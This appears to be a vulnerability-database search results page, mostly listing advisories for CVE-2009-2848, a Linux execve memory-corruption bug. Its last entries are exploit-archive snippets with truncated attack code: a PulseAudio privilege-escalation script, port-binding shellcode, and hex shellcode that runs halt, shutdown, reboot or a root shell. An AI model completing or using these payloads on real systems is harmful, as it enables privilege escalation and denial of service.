1131 matches found
kernel security and bug fix update
2.4.21-63.0.0.0.1.EL - add directio support for qla drivers herb ora 6346849 - support PT Quad card ora 5751043 - io to nfs partition hangs ora 5088963 - add entropy for bnx2 nic ora 5931647 - avoid large allocation-fragmentation in MTU zab - fix clear highpage wli 2.4.21-63.EL - fs: fix pipe nul...
kernel: execve: must clear current->clear_child_tid
The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...
kernel: execve: must clear current->clear_child_tid
The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...
kernel: execve: must clear current->clear_child_tid
The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...
kernel: execve: must clear current->clear_child_tid
The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...
Fedora Core 11 FEDORA-2009-9044 (kernel)
The remote host is missing an update to kernel announced via advisory FEDORA-2009-9044. Note: This VT has been deprecated and is therefore no longer functional. SPDX-FileCopyrightText: 2009 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the...
Fedora Core 11 FEDORA-2009-9044 (kernel)
The remote host is missing an update to kernel announced via advisory FEDORA-2009-9044. OpenVAS Vulnerability Test $Id: fcore20099044.nasl 6624 2017-07-10 06:11:55Z cfischer $ Description: Auto-generated from advisory FEDORA-2009-9044 kernel Authors: Thomas Reinke Copyright: Copyright c 2009 E-So...
kernel: execve: must clear current->clear_child_tid
The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...
Linux kernel execve函数本地拒绝服务漏洞
CVECAN ID: CVE-2009-2848 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的execve函数没有清除current-clearchildtid指针,在处理线程创建和退出过程中启用了CLONECHILDSETTID或CLONECHILDCLEARTID的clone系统调用会导致内存破坏。本地攻击者可以利用这个漏洞导致拒绝服务。 Linux kernel 2.6.x 厂商补丁: Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
Memory corruption
The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...
CVE-2009-2848
The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...
CVE-2009-2848
The execve function in the Linux kernel, possibly 2.6.30-rc6 and earlier, does not properly clear the current-clearchildtid pointer, which allows local users to cause a denial of service memory corruption or possibly gain privileges via a clone system call with CLONECHILDSETTID or...
PulseAudio setuid - Local Privilege Escalation
PulseAudio setuid - Local Privilege Escalation !/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c include...
Linux/x86 Port Binding Shellcode (xor-encoded) 152 bytes
No description provided by source. / Author: Rick Email: [email protected] OS: Linux/x86 Description: Port Bind 4444 xor-encoded -------------------------------------------------------------------- section .text global start start: ;socket PFINET, SOCKSTREAM, 0 push byte 0x66 pop eax push byte...
Linux/x86 - execve(/sbin/halt,/sbin/halt) Shellcode (27 bytes)
Linux/x86 - execve/sbin/halt,/sbin/halt Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x66\x68\x6c\x74" // pushw $0x746c "\x68\x6e\x2f\x68\x61" // push $0x61682f6e...
Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) Shellcode (36 bytes)
Linux/x86 - execve/sbin/shutdown,/sbin/shutdown 0 Shellcode 36 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x64\x6f\x77\x6e" // push $0x6e776f64 "\x68\x73\x68\x75\x74" // push...
Linux/x86 - execve(/sbin/reboot,/sbin/reboot) Shellcode (28 bytes)
Linux/x86 - execve/sbin/reboot,/sbin/reboot Shellcode 28 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x62\x6f\x6f\x74" // push $0x746f6f62 "\x68\x6e\x2f\x72\x65" // push $0x65722f6e...
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)
Linux/x86 - setuid0 + execve/bin/sh Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER tha push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov...
linux/x86 execve shellcode generator null byte free
Exploit for generator platform in category shellcode =================================================== linux/x86 execve shellcode generator null byte free =================================================== / \ Shellcode Generator null byte free. Author: certaindeath This program generates a...
linux/x86 execve shellcode generator null byte free
linux/x86 execve shellcode generator null byte free. Shellcode exploit for generator platform / \ Shellcode Generator null byte free. Author: certaindeath Site: certaindeath.netii.net at the moment under construction This program generates a shellcode which uses the stack to store the command and...